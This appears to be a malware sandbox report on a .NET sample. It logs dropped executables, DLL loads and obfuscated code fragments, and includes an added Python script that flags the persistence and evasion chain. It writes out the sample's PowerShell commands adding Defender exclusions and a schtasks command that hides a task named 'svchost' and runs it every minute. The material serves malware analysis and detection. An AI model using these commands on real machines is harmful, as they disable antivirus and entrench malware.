Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 73%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\ALL slumzick.exe "C:\Users\user\AppData\Roaming\ALL slumzick.exe"
                  Source: C:\Users\user\AppData\Roaming\All function.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe | Process created: C:\Users\user\AppData\Roaming\ALL slumzick.exe "C:\Users\user\AppData\Roaming\ALL slumzick.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
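The process-creation entries above show the whole persistence and defence-evasion chain in four commands: file.exe drops svchost.exe into %AppData%\Roaming, the copy runs powershell.exe with -ExecutionPolicy Bypass to add a Defender path exclusion for its own file and a process exclusion for the name svchost.exe, and schtasks.exe registers a task called "svchost" that re-launches the copy every minute with /RL HIGHEST. The two entries with "Source: unknown" show svchost.exe starting with no recorded parent, which is what a firing scheduled task looks like, although the report does not attribute them. The triage script below is an added example, not Joe Sandbox's own detection logic: it parses entries in the "Source: ... | Process created: ..." form, applies three rules (a system-binary name running outside System32, an Add-MpPreference exclusion from PowerShell, and a schtasks registration whose run level, interval, target path or task name is suspicious) and returns findings. The sample entries are constructed from the ones above plus one benign control line (the real svchost.exe under System32); the list of system binary names, the user-writable path fragments and the 5-minute interval threshold are assumptions.

```python
"""Triage of sandbox "Process created" entries for the XWorm-style persistence and
Defender-tampering chain seen above. Added example: the rules and thresholds are
illustrative assumptions, not the sandbox vendor's own detection logic."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample input, shaped like the report's "Source: ... | Process created: ..."
# entries. The last line is a constructed benign control (real svchost.exe in System32).
SAMPLE_LOG = r"""
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs
"""

# One entry: parent ("Source"), created image path (first token ending in .exe), command line.
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|\s*Process created:\s*(?P<image>.+?\.exe)\s*(?P<cmdline>.*)$",
    re.IGNORECASE,
)
# Assumptions: binaries that legitimately live only under these directories.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "services.exe", "smss.exe", "wininit.exe",
                "winlogon.exe", "conhost.exe", "dllhost.exe", "taskhostw.exe", "runtimebroker.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
MAX_BENIGN_INTERVAL_MIN = 5  # assumption: a task firing this often is worth a look

EXCLUSION_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension|IpAddress)\b", re.IGNORECASE)
BYPASS_RE = re.compile(r"-ExecutionPolicy\s+Bypass\b", re.IGNORECASE)
TASK_TARGET_RE = re.compile(r'/tr\s+"?([^"]+)"?', re.IGNORECASE)
TASK_NAME_RE = re.compile(r'/tn\s+"?([^"\s]+)"?', re.IGNORECASE)
TASK_MINUTES_RE = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.IGNORECASE)


@dataclass
class Finding:
    technique: str
    source: str   # parent process as reported
    image: str    # created process image
    detail: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dirname(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower() + "\\"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one report entry into source, image and cmdline; None if it is not an entry."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def analyze(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for raw in text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        src, image, cmd = rec["source"], rec["image"], rec["cmdline"]
        name = _basename(image)

        # Rule 1: a Windows system-binary name launched from outside the system directories.
        if name in SYSTEM_NAMES and not _dirname(image).startswith(SYSTEM_DIRS):
            findings.append(Finding("masquerading", src, image, f"{name} running from {_dirname(image)}"))

        # Rule 2: Defender exclusion added through PowerShell (worse with -ExecutionPolicy Bypass).
        if name in ("powershell.exe", "pwsh.exe"):
            m = EXCLUSION_RE.search(cmd)
            if m:
                detail = f"Add-MpPreference -Exclusion{m.group(1)}"
                if BYPASS_RE.search(cmd):
                    detail += " with -ExecutionPolicy Bypass"
                findings.append(Finding("defender-exclusion", src, image, detail))

        # Rule 3: schtasks persistence: high run level, tight interval, user-writable target,
        # task name borrowed from a system process. Any one reason is enough to report.
        if name == "schtasks.exe" and re.search(r"/create\b", cmd, re.IGNORECASE):
            reasons = []
            if re.search(r"/RL\s+HIGHEST\b", cmd, re.IGNORECASE):
                reasons.append("/RL HIGHEST")
            mo = TASK_MINUTES_RE.search(cmd)
            if mo and int(mo.group(1)) <= MAX_BENIGN_INTERVAL_MIN:
                reasons.append(f"re-launched every {mo.group(1)} minute(s)")
            tr = TASK_TARGET_RE.search(cmd)
            if tr and any(w in tr.group(1).lower() for w in USER_WRITABLE):
                reasons.append(f"target in user-writable path: {tr.group(1)}")
            tn = TASK_NAME_RE.search(cmd)
            if tn and (tn.group(1).lower() + ".exe") in SYSTEM_NAMES:
                reasons.append(f"task named after system process: {tn.group(1)}")
            if reasons:
                findings.append(Finding("scheduled-task-persistence", src, image, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f.technique}] parent={f.source} image={f.image}: {f.detail}")
```

Run against the constructed sample it reports four findings (one masquerading, two defender-exclusion, one scheduled-task-persistence with all four reasons) and stays silent on the conhost.exe and System32 svchost.exe control lines. On a live host the same three conditions can be checked directly with Get-MpPreference (ExclusionPath, ExclusionProcess) and Get-ScheduledTask, which is where the exclusions and the "svchost" task would have to be removed during cleanup.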
Source: C:\Users\user\Desktop\file.exe | Sections loaded, in order: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\All function.exe | Sections loaded, in order: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Sections loaded, in order: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, avicap32.dll, msvfw32.dll, winmm.dll
Source: C:\Users\user\AppData\Roaming\ALL slumzick.exe | Sections loaded, in order: apphelp.dll, d3d11.dll, d3dcompiler_43.dll, msvcp140.dll, dwmapi.dll, d3dx11_43.dll, dxgi.dll, userenv.dll, vcruntime140_1.dll, vcruntime140.dll, vcruntime140.dll, vcruntime140_1.dll, vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Sections loaded, in order: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded, in order: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                  Source: file.exe | Static file information: File size 14791680 > 1048576
                  Source: file.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0xe1aa00
                  Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr
                  Source: Binary string: C:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: ALL slumzick.exe, 00000004.00000002.2781596322.00007FF6BA65B000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe, 00000004.00000000.1570064054.00007FF6BA65A000.00000002.00000001.01000000.00000008.sdmp, ALL slumzick.exe.2.dr

                  Data Obfuscation

                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.DDYxZ9fO4HnwYyEKU3kg5aJrNoY9fFz2zDKgv4SBC5X3bOl5X3c26WvQUnLjPTr,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.b2Zhz2yZImGfj8ogzhWd35jPDnVQ4lizEiYjv3wENhANkBMoZNttLmS1Wng4Z82,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.Ww3VTE1OcV55ItOgrtwc3FIyxSu4O8yF5oT3fIzcBFRRyVMz2OTJBqPScByA7v4,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.kg8WgIFrMTIjPzLXVZYSZ6Q6vNdi0aqzV6NRXZxBAgYiXUrmUoBDV9VQXptMapP,CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.DJt3jyhgcDbDUbh()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fVciQAHa1R64Zp2lFi5ZQi9[2],CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.PixMCeLDzvEnijS(Convert.FromBase64String(fVciQAHa1R64Zp2lFi5ZQi9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.DDYxZ9fO4HnwYyEKU3kg5aJrNoY9fFz2zDKgv4SBC5X3bOl5X3c26WvQUnLjPTr,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.b2Zhz2yZImGfj8ogzhWd35jPDnVQ4lizEiYjv3wENhANkBMoZNttLmS1Wng4Z82,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.Ww3VTE1OcV55ItOgrtwc3FIyxSu4O8yF5oT3fIzcBFRRyVMz2OTJBqPScByA7v4,AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.kg8WgIFrMTIjPzLXVZYSZ6Q6vNdi0aqzV6NRXZxBAgYiXUrmUoBDV9VQXptMapP,CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.DJt3jyhgcDbDUbh()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{fVciQAHa1R64Zp2lFi5ZQi9[2],CIAEoroYTz20oxLDfIq24NCv1lscIOM7d4NWixY3jd4Gdfeqwwosi7VBlwqCIKnTk7Oljc5g.PixMCeLDzvEnijS(Convert.FromBase64String(fVciQAHa1R64Zp2lFi5ZQi9[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: KzE02pfGPuRw4Lp7HTgcV3W System.AppDomain.Load(byte[])
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: _0DrM4fClbwsqX1efoo9bJeu System.AppDomain.Load(byte[])
                  Source: svchost.exe.0.dr, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: _0DrM4fClbwsqX1efoo9bJeu
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: KzE02pfGPuRw4Lp7HTgcV3W System.AppDomain.Load(byte[])
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: _0DrM4fClbwsqX1efoo9bJeu System.AppDomain.Load(byte[])
                  Source: 0.2.file.exe.38a3c18.2.raw.unpack, 5FAgCtsKSrrC2VMWNGrWCx0.cs | .Net Code: _0DrM4fClbwsqX1efoo9bJeu
                  Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF7C0CC00BD pushad ; iretd 0_2_00007FF7C0CC00C1
                  Source: C:\Users\user\AppData\Roaming\All function.exe | Code function: 2_2_00007FF7C0CC00BD pushad ; iretd 2_2_00007FF7C0CC00C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF7C0BBD2A5 pushad ; iretd 6_2_00007FF7C0BBD2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FF7C0DA2316 push 8B485F93h; iretd 6_2_00007FF7C0DA231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF7C0BBD2A5 pushad ; iretd 9_2_00007FF7C0BBD2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF7C0CDC2C5 push ebx; iretd 9_2_00007FF7C0CDC2DA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 9_2_00007FF7C0DA2316 push 8B485F93h; iretd 9_2_00007FF7C0DA231B
                  Source: svchost.exe.0.dr, AT1vo9WlRDG78s57RQktIveZO6A7XG2wSAp52yLkcZAyHIEmoK5eN0R1pokjZt6.cs | High entropy of concatenated method names: 'lsLMB0k1mzOloo8L67rwcvTn0PZhhQocNpqxrwQ4gZkiPqVhR3', 'PtZKB104eh9CXN8DSCxtOSNrPlKhxbRLgwm4Whiva4Typ1w8lV', 'bOqWL3TZwKGlR8VnMWcZeCD1LgqwmLWtdPNdRcm08gZwO78AgX', 'zQDsgPoZ144gf52sfvMHDOLPS599rx910W7UaPWeEwZXZc5Pt8'
                  Source: svchost.exe.0.dr, q8AGBWimCNl26cs.cs | High entropy of concatenated method names: 'pZG5FXTSQuziM5E', 'ZmgSJl8jUzxoda8', '_0KVNAk1dEQ98X0Y', '_9ifKH25q3nDqSHFXQDeQvIYDKqY', 'AQX1Gb1tuXIRXwV6LksEWs67NGQ', 'nrgYWWZT2Lbyyb0vzoXRhEWXsHp', 'FPp3q0Y24Jm0EGBhqrolWxQYYZ9', 'F7Eqbs2zS4TAU12Bv03bK0xZGyE', 'bQLATnzcempqKkBM1uQeYDjVNRT', 'zlm0V5w9judwigvxCjy0rjzLpRP'
                  Source: svchost.exe.0.dr, FY4tA6CMaVa4guGqTEmyXIf7xvr3iNtk7Lq6zTl2t38pIELcmF7U9sPLA2fruofSqNCGhqcw5vlPs.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'tLd6ptJk33gbJAxVlr6JpGgKPGf0ATucNTSIQhMaD7O9MuOdgL', 'co1TLDrVkALa47756wT5Aih9k9LZYiSN7q6MDJ5Unl8LVnx3we', 'zYV42teDCCOEQB2bAsM1EDFpIYOhXm1hrpHNUyy8ROihue5G9m', '_5BlJwQSBtEeu8F40wMj6UFGwhUot5idctNfpZ5OQnh3qGsDyHd'
